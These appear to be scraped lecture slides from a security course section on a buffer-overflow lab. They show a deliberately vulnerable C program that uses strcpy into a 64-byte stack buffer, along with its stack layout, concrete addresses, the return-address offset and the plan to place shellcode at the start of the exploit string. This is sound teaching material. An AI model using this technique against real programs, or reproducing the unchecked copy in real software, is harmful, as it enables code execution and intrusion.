CS 155 Section 1 PP1Setting up Environmenttarget1.cStack in target1 – layoutsploit1Buf addrDetailsCrafting the exploit stringHintsCS 155 Section 1PP1Eu-Jin GohSetting up EnvironmentDemotarget1.cint foo( char *arg, char *out ) { strcpy( out, arg ); return 0;}int main( int argc, char *argv[] ) { char buf[64]; if ( argc != 2 ) { … } foo( argv[1], buf ); return 0;}Stack in target1 – layout argv[1] == <shellcode + buf’s addy> argv[0] == “/tmp/target1” argc $ra – to which main() will return $fp – for main’s stack frame buf[64] ptr to buf == “out” // args to foo() ptr to argv[1] == “arg” // args to foo()sploit1Need:1. Location of return address•addr on stack for $ra to overwrite•need main()’s $ra (not foo()’s)2. Address of the buffer (“buf” in target1)•address we want to force the program to jump to3. Distance between buffer and $ra–Size of overflow bufferBuf addr•addr of the target1 buf depends exploit overflow buffer size•since exploit string lives above target1 buf on stack•Once exploit buffer buf fixed, addr of target1 buf won’t change.Details1. Size of overflow buffer•Buf addr = 0x9ffffb80•reg ebp = 0x9ffffbc8•Difference is 0x48 = 72•Buffer size = 72 + 4 + 4 + 1 = 812. Addr of buf•Buf = 0x9ffffe60Crafting the exploit string•Want target to jump to start of buf, •place shellcode (size 45 bytes) at the start of the string•$ra exists at offset 76•need exploit string[76] to contain the addr target1 buf (0x9ffffe60)Hints1. Various ways of seizing program flow control without overwriting return address2. Learn what registers esp, ebp point to during stages of program execution3. Learn what happens to registers and memory during LEAVE and RET
View Full Document